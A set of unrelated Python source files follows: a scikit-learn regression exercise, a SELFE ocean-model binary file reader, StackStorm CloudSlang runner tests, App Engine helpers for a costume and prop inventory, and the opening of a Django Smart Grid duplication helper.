score = model.score(X_test, y_test)
drawLine(model, X_test, y_test, "Accept(F.Undergrad)", score)
#
# TODO: Duplicate the process above (almost). This time is going to be
# a bit more complicated. Instead of modeling one feature as a function
# of another, you will attempt to do multivariate linear regression to
# model one feature as a function of TWO other features.
#
# Model the amount charged for room and board AND the number of enrolled
# students, as a function of the number of accepted students. To do
# this, instead of creating a regular slice for a single-feature input,
# simply create a slice that contains both columns you wish to use as
# inputs. Your training labels will remain a single slice.
#
X_train, X_test, y_train, y_test = train_test_split(X[['Room.Board','Enroll']], X['Accept'], test_size=0.3, random_state=7)
model.fit(X_train, y_train)
score = model.score(X_test, y_test)
drawPlane(model, X_test, y_test, "Accept(Room&Board,Enroll)", score)
#
# INFO: That concludes this assignment
#
# INFO + HINT On Fitting, Scoring, and Predicting:
#
# Here's a hint to help you complete the assignment without pulling
# your hair out! When you use .fit(), .score(), and .predict() on
# your model, SciKit-Learn expects your training data to be in
# spreadsheet (2D Array-Like) form. This means you can't simply
# pass in a 1D Array (slice) and get away with it.
#
# To properly prep your data, you have to pass in a 2D Numpy Array,
# or a dataframe. But what happens if you really only want to pass
# in a single feature?
#
# If you slice your dataframe using df[['ColumnName']] syntax, the
# result that comes back is actually a *dataframe*. Go ahead and do
# a type() on it to check it out. Since it's already a dataframe,
# you're good -- no further changes needed.
#
# But if you slice your dataframe using the df.ColumnName syntax,
# OR if you call df['ColumnName'], the result that comes back is
# actually a series (1D Array)! This will cause SKLearn to bug out.
# So if you are slicing using either of those two techniques, before
# sending your training or testing data to .fit / .score, do a
# my_column = my_column.reshape(-1,1). This will convert your 1D
# array of [n_samples], to a 2D array shaped like [n_samples, 1].
# A single feature, with many samples.
#
# If you did something like my_column = [my_column], that would produce
# an array in the shape of [1, n_samples], which is incorrect because
# SKLearn expects your data to be arranged as [n_samples, n_features].
# Keep in mind, all of the above only relates to your "X" or input
# data, and does not apply to your "y" or labels.
#
# Data Scientist Challenge
# ========================
#
# You've experimented with a number of feature scaling techniques
# already, such as MaxAbsScaler, MinMaxScaler, Normalizer, StandardScaler
# and more from http://scikit-learn.org/stable/modules/classes.html#module-sklearn.preprocessing
#
# What happens if you apply scaling to your data before doing
# linear regression? Would it alter the quality of your results?
# Do the scalers that work on a per-feature basis, such as MinMaxScaler
# behave differently that those that work on a multi-feature basis, such
# as normalize? And moreover, once your features have been scaled, you
# won't be able to use the resulting regression directly... unless you're
# able to .inverse_transform() the scaling. Do all of the SciKit-Learn
# scalers support that?
#
# This is your time to shine and to show how much of an explorer you are:
# Dive deeper into uncharted lands, browse SciKit-Learn's documentation,
# scour Google, ask questions on Quora, Stack-Overflow, and the course
# message board, and see if you can discover something that will be of
# benefit to you in the future!
|
|
#========================================================================
# File: pyselfe.py
#========================================================================
"""@package docstring
pyselfe : SELFE Model Dataset IO Functions
This module enables the reading of model results generated by SELFE
Works with data format ver.5 SELFE binary files and implements
the extraction of subsets of data from a series of files.
NOTE : Only tested for pure S coordinates. Hybrid S-Z not tested.
Output to other formats not yet implemented.
USAGE EXAMPLE:
sys.path.append('/home/dharhas/scripts/selfe') #path to location of pyselfe.py
import pyselfe
model = pyselfe.Dataset('./data/1_elev.61') #path to first file of series
[t,t_iter,eta,dp,mdata] = model.read_time_series(param,xy=xy,nfiles=nf,datadir=datadir)
#where param = elev.61,hvel.64 etc. read_time_series is documented in detail below.
"""
from __future__ import (absolute_import, division, print_function)
#
#
__author__ = 'Dharhas Pothina'
__revision__ = "$Revision: 0.1.3 $"
__doc__ = "SELFE Unstructured Grid Ocean Model IO Functions"
#========================================================================
# imports
#========================================================================
import numpy as N
from scipy.spatial import cKDTree as KDTree
import numpyIO as io
import sys
import os
class Dataset:
"""
SELFE Model Binary IO Functions
Presently enables reading SELFE dataformat version 5.0 binary output files.
Can read 2D & 3D scalar and vector variables.
Usage Example:
model = pyselfe.Dataset('1_hvel.64')
[t,t_iter,eta,dp,data] = model.read_time_series()
t = time in seconds
t_iter = iteration number
eta = water surface elevation
dp = bathymetric depth
data = 2D/3D variables
@author Dharhas Pothina
@version 0.2
"""
def __init__(self,fname, nfiles=1):
"Initialise by reading header information from file"
self.fname = fname
fid = open(fname,'rb')
self.read_header(fid)
self.read_hgrid(fid)
self.data_start_pos=fid.tell()
self.compute_step_size()
self.datadir = os.path.split(fname)[0]
self.nfiles = nfiles
def read_header(self,fid):
"Read header information from SELFE binary output file"
#read misc header info
self.data_format = fid.read(48)
self.version = fid.read(48)
self.start_time = fid.read(48)
self.var_type = fid.read(48)
self.var_dimension = fid.read(48)
self.nsteps = io.fread(fid,1,'i')
self.dt = io.fread(fid,1,'f')
self.skip = io.fread(fid,1,'i')
self.flag_sv = io.fread(fid,1,'i')
self.flag_dm = io.fread(fid,1,'i')
#@todo check when zDes needs to be read
#self.zDes = io.fread(fid,1,'f')
#read vert grid info
self.nlevels = io.fread(fid,1,'i')
self.kz = io.fread(fid,1,'i')
self.h0 = io.fread(fid,1,'f')
self.hs = io.fread(fid,1,'f')
self.hc = io.fread(fid,1,'f')
self.theta_b = io.fread(fid,1,'f')
self.theta = io.fread(fid,1,'f')
self.zlevels = io.fread(fid,self.kz,'f')
self.slevels = io.fread(fid,self.nlevels-self.kz,'f')
def read_hgrid(self,fid):
"Read horizontal grid info from SELFE binary output filefile"
#read dimensions
self.np = io.fread(fid,1,'i')
self.ne = io.fread(fid,1,'i')
#read grid and bathymetry
pos=fid.tell()
hgridtmp = io.fread(fid,4*self.np,'f')
self.x, self.y, self.dp, tmp1 = hgridtmp.reshape(self.np,4).transpose()
#read bottom index
fid.seek(pos)
hgridtmp = io.fread(fid,4*self.np,'i')
tmp1, tmp2, tmp3, self.bot_idx = hgridtmp.reshape(self.np,4).transpose()
#read element connectivity list
self.elem = io.fread(fid,4*self.ne,'i')
self.elem = self.elem.reshape(self.ne,4)[:,1:4]
#create kdtree
self.kdtree = KDTree(zip(self.x,self.y))
def compute_step_size(self):
"Compute the data block size to move one timestep within the file"
#calculate grid size depending on whether dataset is 3D or 2D
if self.flag_dm == 3:
#@todo check what needs to be done with bIdx (==0?)for dry nodes
bIdx = self.bot_idx
bIdx[bIdx<1] = 1
self.grid_size = sum(self.nlevels - bIdx+1)
elif self.flag_dm == 2:
self.grid_size = self.np
#compute step size
self.step_size = 2*4 + self.np*4 + self.grid_size*4*self.flag_sv;
def read_time_series(self,fname,nodes=None,levels=None,xy=N.array([]),nfiles=3,sfile=1,datadir=None):
"""
Main function to extract a spatial and temporal slice of entire 3D Time series.
Returns [t,t_iter,eta,dp,data] where
t : time in seconds from simulation start
t_iter : iteration number from simulation start
eta : Surface water elevation time series
dp : Bathymetry (depth of sea bed from MSL)
data[t,nodes,levels,vars] : extracted data slice (ie Salinity, Temp, Velocity etc)
Options:
nodes : list of nodes to extract (default is all nodes)
level : list of levels to extract (default is all levels)
xy : array of x,y coordinates to extract (default is none)
sfile : serial number of starting file (default is one)
nfiles : number of files in data sequence (default is one)
NOTE : node index starts at zero so add one to match up with node numbers in
SELFE hgrid.gr3 file
"""
#initialize vars
t = N.array([])
t_iter = N.array([])
eta = []
data = []
if nfiles is None:
nfiles = self.nfiles
if datadir is None:
datadir = self.datadir
#convert xy points to list of nodes,
#find parent elements & calculate interpolation weights
if xy.size!=0:
if xy.shape[1]!=2:
sys.exit('xy array shape wrong')
nodes=N.array([],dtype='int32')
arco=N.array([])
for xy00 in xy:
parent, tmparco, node3 = self.find_parent_element(xy00[0],xy00[1])
nodes = N.append(nodes,node3-1)
arco = N.append(arco,tmparco)
#set default for nodes to be all nodes
#node index starts at zero
elif nodes is None:
nodes = N.arange(self.np)
#set default for level to be all levels
if levels is None:
levels = N.arange(self.nlevels)
#check whether 2D or 3D variable is being read
if self.flag_dm==2:
nlevs = 1
levels = N.array([0])
else:
nlevs = self.nlevels
#read time series slice
for files in N.arange(sfile, sfile + nfiles):
try:
fname1 = datadir + '/' + str(files) + '_' + fname
fid = open(fname1,'rb')
fid.seek(self.data_start_pos)
for i in N.arange(self.nsteps):
t = N.append(t, io.fread(fid, 1, 'f'))
t_iter = N.append(t_iter, io.fread(fid, 1, 'i'))
eta.append(io.fread(fid, self.np, 'f'))
tmpdata = io.fread(fid, self.flag_sv*self.grid_size, 'f')
tmpdata = tmpdata.reshape(self.np, nlevs, self.flag_sv)
#only keep requested slice of tmpdata
#i.e. tmpdata[nodes,levels,var]
tmpdata = tmpdata[nodes,:,:]
tmpdata = tmpdata[:,levels,:]
data.append(tmpdata)
except:
continue
# import pdb; pdb.set_trace()
eta = N.column_stack(eta[:]).T
eta = eta[:,nodes]
data = N.array(data)
dp = self.dp[nodes]
#convert nodal values back to xy point values if needed
if xy.size!=0:
#try:#not sure about this. need to look at it ion more detail put in to remove shape error
tmpdata = N.zeros((data.shape[0],data.shape[1]//3,data.shape[2],data.shape[3]))/0.
#except:
# tmpdata = N.zeros((data.shape[0],data.shape[1]//3,data.shape[2]))/0.
tmpeta = N.zeros((eta.shape[0],eta.shape[1]//3))/0.
tmpdp = N.zeros(dp.shape[0]//3)/0.
for i in range(xy.shape[0]):
n1 = i*3
n2 = n1+1
n3 = n2+1
tmpdata[:,i,:,:] = data[:,n1,:,:]*arco[n1] + data[:,n2,:,:]*arco[n2] + data[:,n3,:,:]*arco[n3]
tmpeta[:,i] = eta[:,n1]*arco[n1] + eta[:,n2]*arco[n2] + eta[:,n3]*arco[n3]
tmpdp[i] = dp[n1]*arco[n1] + dp[n2]*arco[n2] + dp[n3]*arco[n3]
data = tmpdata
eta = tmpeta
dp = tmpdp
return [t,t_iter,eta,dp,data]
def find_parent_element(self,x00,y00):
"""
Find Parent Element of a given (x,y) point and calculate interpolation wieghts
Uses brute force search through all elements. Calculates whether point is internal/external
to element by comparing summed area of sub triangles with area of triangle element.
@todo implement binary tree search for efficiency
Returns [parent,arco,node3] : parent element number, interp wieghts & element node numbers
"""
def signa(x1, x2, x3, y1, y2, y3):
"Return signed area of triangle"
return(((x1-x3)*(y2-y3)-(x2-x3)*(y1-y3))/2)
parent = -1
nm = self.elem.view()
out = N.zeros(3)/0.
x = self.x.view()
y = self.y.view()
for i in N.arange(self.ne):
aa = 0
ar = 0 #area
for j in N.arange(3):
j1 = j+1
j2 = j+2
if (j1>2):
j1 = j1-3
if (j2>2):
j2 = j2-3
n0 = nm[i,j]-1 #zero based index rather than 1 based index
n1 = nm[i,j1]-1
n2 = nm[i,j2]-1
out[j] = signa(x[n1], x[n2], x00, y[n1], y[n2], y00) #temporary storage
aa = aa+abs(out[j])
if (j==0):
ar = signa(x[n1], x[n2], x[n0], y[n1], y[n2], y[n0])
if (ar<=0):
sys.exit('Negative area:' + str(ar))
ae = abs(aa-ar)/ar
if (ae<=1.e-5):
parent = i
node3 = nm[i,0:3]
arco = out[0:3]/ar
arco[1] = max(0., min(1., arco[1]))
arco[2] = max(0., min(1., arco[2]))
if (arco[0]+arco[1]>1):
arco[2] = 0
arco[1] = 1-arco[0]
else:
arco[2] = 1-arco[0]-arco[1]
break
if (parent==-1):
sys.exit('Cannot find a parent:' + str(x00) +',' +str(y00))
else:
print('Parent Element :',parent+1,' ,Nodes: ',node3)
return [parent, arco, node3]
def compute_relative_rec(self, node, level):
"Computes offset for extracting particluar node/level: NOTE THIS FUNCTION NOT COMPLETE/TESTED"
count = 0
step = N.zeros(self.np, self.nlevels, self.flag_sv)/0.
for i in range(self.np):
for k in range(max(1, self.bot_idx[i]), self.nlevels):
for m in range(self.flag_sv):
count = count+1
step_size[i,k,m] = count
def read_time_series_xy(self, variable, x, y, sigma_level='middle', return_eta=False):
"""
finds nearest 3 nodes to x,y and returns the average value
"""
xy = N.hstack((x,y))
dist, nodes = self.kdtree.query(xy, k=3)
data = []
if sigma_level=='average':
t, t_iter, eta, dp, data = self.read_time_series(variable, nodes=nodes)
eta = eta.mean(axis=1)
data = data[:,:,:,0].mean(axis=2).mean(axis=1)
data = data.mean(axis=1).mean(axis=1) #take average of all levels and then 3 nodes for now. implement idw or area wieghted average later
if return_eta:
return [N.column_stack((t,data)), N.column_stack((t,eta))]
else:
return N.column_stack((t,data))
elif sigma_level=='top':
sigma_level = 0
elif sigma_level=='bottom':
sigma_level = self.nlevels - 1
elif sigma_level=='middle':
sigma_level = self.nlevels//2
t, t_iter, eta, dp, data = self.read_time_series(variable, nodes=nodes, levels=sigma_level)
eta = eta.mean(axis=1)
data = data[:,:,0,:].mean(axis=1)
#data.mean(axis=1).shape[:,0,:]
#data = data.mean(axis=1) #take average of all levels and then 3 nodes for now. implement idw or area wieghted average later
# import pdb; pdb.set_trace()
if return_eta:
return [N.column_stack((t,data)), N.column_stack((t,eta))]
else:
return N.column_stack((t,data))
|
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
from unittest2 import TestCase
import st2actions.runners.cloudslang.cloudslang_runner as csr
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_FAILED
import st2tests.config as tests_config
tests_config.parse_args()
class CloudSlangRunnerTestCase(TestCase):
def test_runner_creation(self):
runner = csr.get_runner()
self.assertTrue(runner)
self.assertTrue(runner.runner_id)
def test_pre_run_sets_attributes(self):
entry_point = 'path'
inputs = {'a': 1}
timeout = 10
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
self.assertEqual(runner.entry_point, entry_point)
self.assertEqual(runner._inputs, inputs)
self.assertEqual(runner._timeout, timeout)
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.quote_unix')
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
def test_run_calls_a_new_process_success(self, mock_run_command, mock_quote_unix):
entry_point = 'path'
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: None,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
mock_run_command.return_value = (0, "", "", False)
mock_quote_unix.return_value = ""
result = runner.run({})
mock_quote_unix.assert_called_with(tests_config.CONF.cloudslang.home_dir)
self.assertTrue(mock_run_command.called)
self.assertEqual(LIVEACTION_STATUS_SUCCEEDED, result[0])
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.quote_unix')
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
def test_run_calls_a_new_process_failure(self, mock_run_command, mock_quote_unix):
timeout = 1
runner = csr.get_runner()
runner.runner_parameters = {
csr.RUNNER_INPUTS: None,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
mock_run_command.return_value = (1, "", "", False)
mock_quote_unix.return_value = ""
result = runner.run({})
mock_quote_unix.assert_called_with(tests_config.CONF.cloudslang.home_dir)
self.assertTrue(mock_run_command.called)
self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
def test_run_calls_a_new_process_timeout(self, mock_run_command):
entry_point = 'path'
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: None,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
mock_run_command.return_value = (0, "", "", True)
result = runner.run({})
self.assertTrue(mock_run_command.called)
self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.yaml.safe_dump')
def test_inputs_are_save_to_file_properly(self, mock_yaml_dump, mock_run_command):
entry_point = 'path'
inputs = {'a': 1}
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
mock_run_command.return_value = (0, "", "", True)
mock_yaml_dump.return_value = ""
result = runner.run({})
self.assertTrue(mock_run_command.called)
mock_yaml_dump.assert_called_with(inputs, default_flow_style=False)
self.assertEqual(LIVEACTION_STATUS_FAILED, result[0])
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.os.remove')
def test_temp_file_deletes_when_exception_occurs(self, mock_os_remove, mock_run_command):
entry_point = 'path'
inputs = {'a': 1}
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
mock_run_command.return_value = (0, "", "", True)
mock_run_command.side_effect = IOError('Boom!')
with self.assertRaisesRegex(IOError, "Boom!"):
runner.run({})
self.assertTrue(mock_os_remove.called)
# lets really remove it now
os.remove(mock_os_remove.call_args[0][0])
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
def test_inputs_provided_via_inputs_runner_parameter(self, mock_run_command):
entry_point = 'path'
inputs = {'a': 1}
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner._write_inputs_to_a_temp_file = mock.Mock()
runner._write_inputs_to_a_temp_file.return_value = None
mock_run_command.return_value = (0, "", "", False)
runner.pre_run()
runner.run({})
runner._write_inputs_to_a_temp_file.assert_called_with(inputs=inputs)
@mock.patch('st2actions.runners.cloudslang.cloudslang_runner.run_command')
def test_inputs_provided_via_action_parameters(self, mock_run_command):
entry_point = 'path'
inputs = None
timeout = 1
action_parameters = {'foo': 'bar'}
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner._write_inputs_to_a_temp_file = mock.Mock()
runner._write_inputs_to_a_temp_file.return_value = None
mock_run_command.return_value = (0, "", "", False)
runner.pre_run()
runner.run(action_parameters)
runner._write_inputs_to_a_temp_file.assert_called_with(inputs=action_parameters)
def test_prepare_command(self):
entry_point = 'flow_path'
inputs = None
timeout = 1
runner = csr.get_runner()
runner.entry_point = entry_point
runner.runner_parameters = {
csr.RUNNER_INPUTS: inputs,
csr.RUNNER_TIMEOUT: timeout,
}
runner.pre_run()
# No inputs
result = runner._prepare_command(has_inputs=False, inputs_file_path=None)
expected = '/opt/cslang/bin/cslang run --f flow_path --cp /opt/cslang'
self.assertEqual(result, expected)
# Inputs
result = runner._prepare_command(has_inputs=True, inputs_file_path='inputs_file')
expected = '/opt/cslang/bin/cslang run --f flow_path --cp /opt/cslang --if inputs_file'
self.assertEqual(result, expected)
|
|
# Copyright (c) 2017 Future Gadget Laboratories.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# +-------------------------+
# | Python built-in imports |
# +-------------------------+
import os
import requests
import logging
from hashlib import sha1
import base64
# +---------------------+
# | Third party imports |
# +---------------------+
from google.appengine.ext import ndb
from google.appengine.api import app_identity
from google.appengine.api import images
from google.appengine.ext import blobstore
import cloudstorage as gcs
# +---------------------+
# | First party imports |
# +---------------------+
from warehouse_models import Item, cloneItem, List
# +-----------------+
# | Item Exceptions |
# +-----------------+
class ItemDeletedException(Exception):
'''Raised when trying to submit an edit to a deleted item.'''
def __init__(self,*args,**kwargs):
Exception.__init__(self,*args,**kwargs)
class ItemPurgedException(Exception):
'''Raised when trying to submit an edit to an item that has been permanently deleted.'''
def __init__(self,*args,**kwargs):
Exception.__init__(self,*args,**kwargs)
# +-----------------------+
# | Transactional helpers |
# +-----------------------+
@ndb.transactional(xg=True, retries=1)
def commitDelete(item_key,user):
item = item_key.get()
if item.outdated:
raise OutdatedEditException()
if user.permissions=="Standard user":
item.marked_for_deletion = True
else:
item.deleted = True
item.suggested_by = user.name
item.put()
@ndb.transactional(xg=True, retries=1)
def commitUnDelete(item_key):
item = item_key.get()
item.deleted = False
item.marked_for_deletion = False
item.suggested_by = ""
item.put()
@ndb.transactional(xg=True, retries=1)
def commitPurge(item_key):
toDelete = [item_key] + [suggestion for suggestion in item_key.get().suggested_edits]
while item_key.parent():
item_key = item_key.parent()
toDelete.append(item_key)
# logging.info("\n\n\n")
# logging.info(toDelete)
for k in toDelete:
k.delete()
@ndb.transactional(xg=True, retries=1)
def commitEdit(old_key, new_item, suggestion=False):
'''Stores the new item and ensures that the
parent-child relationship is enforced between the
old item and the new item.
TRANSACTIONAL: This is transactional so all edits to the database
cannot be left in an unexpected state.
SIDE EFFECT: Sets the parent of the new_item to be the old_key.
Args:
old_key: The key of the item that this is an edit to.
new_item: The new version of the item to be commited.
Returns:
The key of the item that was commited, this could not be the new_item
since it may have been mutated to work with previous versions.
'''
old_item = old_key.get()
# Check if item was deleted
if old_item is None:
raise ItemPurgedException()
# Find newest version
if old_item.outdated:
while old_item.outdated:
old_item = old_item.child.get()
# Update the parent
new_item = cloneItem(new_item, parentKey=old_item.key)
# check if deleted but not purged
if old_item.deleted:
raise ItemDeletedException()
old_item.outdated = not suggestion
new_key = new_item.put()
if suggestion:
old_item.suggested_edits.append(new_key)
else:
old_item.child = new_key
old_item.put()
return new_item.key
@ndb.transactional(xg=True, retries=3)
def removeFromList(list_key, item_key):
l = list_key.get()
item = item_key.get();
l.items.remove([i for i in l.items if i.get().qr_code == item.qr_code][0])
l.put()
@ndb.transactional(retries=3)
def addToList(list_key, item_key):
l = list_key.get()
l.items.append(item_key)
l.put()
def removeFromAllLists(item_key):
lists = List.query().fetch()
# NOTE: This still allows for a race if someone adds to a list
# after this point in the function. This is okay since it will
# only lead to the number of items being off and is not worth
# creating a huge transaction for every time.
for l in lists:
if item_key in l.items:
removeFromList(l.key, item_key)
# +-----------------------+
# | Miscellaneous Helpers |
# +-----------------------+
def getImageHash(image_data):
m = sha1()
m.update(image_data)
return m.hexdigest()
def saveImageInGCS(image_data):
# ======================
# Save file in GCS
# ======================
image_data = base64.b64decode(image_data)#image_data.encode('utf-8')
bucket_name = os.environ.get('BUCKET_NAME',
app_identity.get_default_gcs_bucket_name())
bucket = '/' + bucket_name
filename = bucket + '/' + getImageHash(image_data) + '.png'
write_retry_params = gcs.RetryParams(backoff_factor=1.1)
gcs_file = gcs.open(filename,
'w',
content_type='image/png',
options={'x-goog-meta-foo': 'foo',
'x-goog-meta-bar': 'bar'},
retry_params=write_retry_params)
gcs_file.write(image_data)
gcs_file.close()
gcs_object_name = '/gs' + filename
# logging.info(gcs_object_name)
blob_key = blobstore.create_gs_key(gcs_object_name)
image_url = images.get_serving_url(blob_key)
return image_url
# ======================
# End saving file to GCS
# ======================
# Validates an html string using the w3 validator.
def validateHTML(html_string):
# TODO disable when deployed
# TODO: Currently, the w3 html validator is broken. Remove when the site is up and running again
return html_string
response = requests.post("https://validator.w3.org/nu/?out=json",
data=html_string,
headers={'Content-Type':'text/html; charset=utf-8'})
messages = response.json()['messages']
if messages:
for m in messages:
if m['type'] == 'error':
messsage_for_human = u'Invalid HTML: {issue}\n{snippet} on line:{line}'.format(issue=m['message'], snippet=m['extract'],line=m['lastLine'])
logging.error(messsage_for_human)
else:
messsage_for_human = u'Validator message: ' + str(m)
logging.warning(messsage_for_human)
return html_string + '<script>alert("{n} HTML errors found, check the logs for details");</script>'.format(n=len(messages))
return html_string
# Finds the most recent version of an item.
def findUpdatedItem(item_key):
updated = item_key.get()
updated_key = item_key
# Ensure item exists, if not find an ancestor that does.
while updated is None and updated_key.parent():
# Checks if item has been rolled back or deleted
updated_key = item_key.parent()
updated = updated_key.get()
# If no ancestor exists the item has been deleted/purged
# TODO test this case where item is deleted/purged
if updated is None or updated_key is None:
return None
# We have a valid item, now ensure it is the most recent copy
else:
while updated.outdated:
updated = updated.child.get()
if updated.deleted:
return None
return updated
# Converts text list of tags to array of tags
def parseTags(tags_string):
tags_list = []
# Find newline character
tag_end_index = tags_string.find("\n")
# Check newline character exists in string
while tag_end_index != -1:
# Add tag to list
tags_list.append(tags_string[:tag_end_index - 1].lower())
# Shrink or delete string based on how much material is left in string
if tag_end_index + 1 < len(tags_string):
tags_string = tags_string[tag_end_index + 1:len(tags_string)]
else:
tags_string = ""
tag_end_index = tags_string.find("\n")
# Potentially still has a tag not covered. Adds last tag to list if possible
if len(tags_string) != 0:
tags_list.append(tags_string.lower())
return tags_list
# Filters viewable items based on selected boxes in MainPage
def filterItems(user_id, item_name, item_type, item_condition, item_colors,
item_color_grouping, costume_article, costume_size_string,
min_size_num, max_size_num, exclude_unknown_size, tags_filter, tag_grouping,
availability_filter, outdated=False):
query = Item.query()
query = query.filter(Item.outdated == outdated)
# -------------------------
# Case by case search
# -------------------------
# Tags
tags_list = parseTags(tags_filter)
if len(tags_list) != 0:
if tag_grouping == "inclusive":
query = query.filter(Item.tags.IN(tags_list))
else:
for tag in tags_list:
query = query.filter(Item.tags == tag)
if availability_filter == 'checkedOutYou':
query = query.filter(Item.checked_out_by == user_id)
# Costume article type
if item_type == "Costume":
query = query.order(Item.clothing_size_num)
query = query.filter(ndb.OR(ndb.AND(Item.clothing_size_num >= int(min_size_num), Item.clothing_size_num <= int(max_size_num)), Item.clothing_size_num == -1))
if exclude_unknown_size:
query = query.filter(Item.clothing_size_num != -1)
if (costume_article):
query = query.filter(Item.clothing_article_type == costume_article)
if (costume_size_string):
query = query.filter(Item.clothing_size_string == costume_size_string)
# # -------------------------
# # Always explicitly search
# # -------------------------
# Item type
if item_type == "All":
query = query.filter(Item.item_type.IN(["Costume", "Prop"]))
elif item_type:
query = query.filter(Item.item_type == item_type)
# Item Condition
if (len(item_condition) == 0):
item_condition = ["Good", "Fair", "Poor", "Being repaired" ]
query = query.filter(Item.condition.IN(item_condition))
# Colors
if len(item_colors) != 0:
if item_color_grouping == "inclusive":
query = query.filter(Item.item_color.IN(item_colors))
else:
for color in item_colors:
query = query.filter(Item.item_color == color)
if availability_filter == 'All':
query = query.filter(Item.checked_out.IN([True, False]))
elif availability_filter == 'checkedIn':
query = query.filter(Item.checked_out == False)
elif availability_filter:
query = query.filter(Item.checked_out == True)
results = query.order(Item.updated).fetch()
# Name
if item_name != '':
results = [x for x in results if x.name.lower().find(item_name.lower()) >= 0]
return results
# TODO: actually remove rolled back and deleted items
def updateList(l):
to_add = []
to_remove = []
for item_key in l.items:
updated = findUpdatedItem(item_key)
logging.info('Updated key:%s Item key:%s', updated.key if updated else None, item_key)
if updated is None:
to_remove.append(item_key)
elif updated.key != item_key:
to_add.append(updated.key)
to_remove.append(item_key)
# logging.info("Adding %s", [i.urlsafe() for i in to_add])
# logging.info("Removing %s", [i.urlsafe() for i in to_remove])
l.items = filter(lambda a: a not in to_remove, l.items)
l.items.extend(to_add)
if to_add or to_remove:
l.put()
|
|
'''Helper functions for the Smart Grid Game Library and grid instance.
Created on Mar 15, 2013
@author: Carleton Moore
'''
from django.db.models.deletion import Collector
from django.db.models.fields.related import ForeignKey
from apps.widgets.smartgrid.models import Action, Activity, Commitment, Event, Filler, ColumnName, \
Level, TextPromptQuestion, Grid, ColumnGrid
from django.shortcuts import get_object_or_404
from apps.widgets.smartgrid_library.models import LibraryAction, LibraryActivity, \
LibraryCommitment, LibraryEvent, LibraryColumnName, LibraryTextPromptQuestion
from django.http import Http404
from apps.widgets.smartgrid_design.models import DesignerAction, DesignerColumnName, \
DesignerActivity, DesignerCommitment, DesignerEvent, DesignerFiller, DesignerLevel,\
DesignerTextPromptQuestion, DesignerGrid, DesignerColumnGrid, Draft
import os
from django.core.management import call_command
from apps.managers.predicate_mgr import predicate_mgr
def duplicate(obj, value=None, field=None, duplicate_order=None): # pylint: disable=R0914
"""
Duplicate all related objects of obj setting
field to value. If one of the duplicate
objects has an FK to another duplicate object
update that as well. Return the duplicate copy
of obj.
duplicate_order is a list of models which specify how
the duplicate objects are saved. For complex objects
this can matter. Check to save if objects are being
saved correctly and if not just pass in related objects
in the order that they should be saved.
"""
collector = Collector({})
collector.collect([obj])
collector.sort()
related_models = collector.data.keys()
data_snapshot = {}
for key in collector.data.keys():
data_snapshot.update({key: dict(zip([item.pk for item in collector.data[key]], \
[item for item in collector.data[key]]))})
root_obj = None
# Sometimes it's good enough just to save in reverse deletion order.
if duplicate_order is None:
duplicate_order = reversed(related_models)
for model in duplicate_order:
# Find all FKs on model that point to a related_model.
fks = []
for f in model._meta.fields:
if isinstance(f, ForeignKey) and f.rel.to in related_models:
fks.append(f)
